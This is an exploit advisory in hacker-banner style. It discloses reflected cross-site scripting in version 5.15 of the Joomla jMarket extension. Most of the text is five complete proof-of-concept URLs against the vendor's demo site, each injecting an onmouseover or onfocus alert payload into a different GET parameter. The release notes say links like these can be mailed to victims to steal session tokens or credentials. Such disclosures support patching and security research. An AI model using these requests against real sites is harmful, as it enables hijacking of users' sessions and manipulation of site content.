Headline
Joomla jMarket 5.15 Cross Site Scripting
Joomla jMarket extension version 5.15 suffers from a cross site scripting vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││ C r a C k E r ┌┘
┌┘ T H E C R A C K O F E T E R N A L M I G H T ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘
┌──── From The Ashes and Dust Rises An Unimaginable crack… ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ [ Exploits ] ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: Author : CraCkEr :
│ Website : extensions.joomla.org │
│ Vendor : Joobi │
│ Software : jMarket 5.15 Multi-Vendor Shopping Cart for Joomla │
│ Vuln Type: Reflected XSS │
│ Method : GET │
│ Impact : Manipulate the content of the site │
│ │
│────────────────────────────────────────────────────────────────────────────────────────│
│ B4nks-NET irc.b4nks.tk #unix ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
: :
│ Release Notes: │
│ ═════════════ │
│ The attacker can send to victim a link containing a malicious URL in an email or │
│ instant message can perform a wide variety of actions, such as stealing the victim’s │
│ session token or login credentials │
│ │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
Greets:
The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL
CryptoJob (Twitter) twitter.com/CryptozJob
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘ © CraCkEr 2022 ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
GET parameter ‘controller’ is vulnerable to XSS
https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-resultsqmzro%22onmouseover=%22alert(1)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22rqo95my69wy
GET parameter ‘trucs%5Bx%5D%5Bsearch%5D’ is vulnerable to XSS
https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=gx3vt%20onfocus%3dalert(1)%20autofocus%3d%20itkrzsug7w5&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D
GET parameter ‘vWjx’ is vulnerable to XSS
https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=home&wajx=1&wmjx=1&tmpl=component&type=raw&limitstartw44_a45a2eb907d344c4d11b95b39a363661=20&vWjx=sabif%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20ax650sfkaze&vWdjx=44&fRmjx=wf_catalog_results_catalog_search_results&trucs%5Bx%5D%5Bsearch%5D=Search…&choicesorting=newest&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&limitstartw44_a45a2eb907d344c4d11b95b39a363661=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWw%3D
GET parameter ‘Itemid’ is vulnerable to XSS
https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=Search…&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=is9fk%20onfocus%3dalert(1)%20autofocus%3d%20f7adumy8lgl&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=0&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D
GET parameter ‘trucs%5B182%5D%5Bpid%5D’ is vulnerable to XSS
https://joomla.demo.joobi.org/index.php?option=com_jvouchers&controller=catalog-results&task=query&wajx=1&wmjx=1&tmpl=component&type=raw&crtyid=12&trucs%5Bx%5D%5Bsearch%5D=Search…&trucs%5Bx%5D%5Bcatid%5D=28&option=com_jvouchers&Itemid=236&boxchecked=0&b92b3eff2e9146e306b474abafad73b4=zjg1&trucs%5Bs%5D%5Bftype%5D=0&trucs%5Bs%5D%5Bmid%5D=182&trucs%5Bs%5D%5Bpkey%5D=pid&trucs%5B182%5D%5Bpid%5D=ugb9n%20onmouseover%3dalert(1)%20style%3dposition%3aabsolute%3bwidth%3a100%25%3bheight%3a100%25%3btop%3a0%3bleft%3a0%3b%20zn67rnvkbhb&trucs%5Bs%5D%5Bnew%5D=1&task_redirect=home&returnid=aW5kZXgucGhwP29wdGlvbj1jb21fanZvdWNoZXJzJmNvbnRyb2xsZXI9Y2F0YWxvZy1yZXN1bHRzJnRhc2s9aG9tZSZJdGVtaWQ9MjM2JnNlYXJjaD1TZWFyY2guLi4mZm9ybWF0PWh0bWwmY2F0YWxvZ1NlYXJjaElucHV0U2l6ZT0xMDAlJmF1dG9zYXZlPTE%3D
[-] Done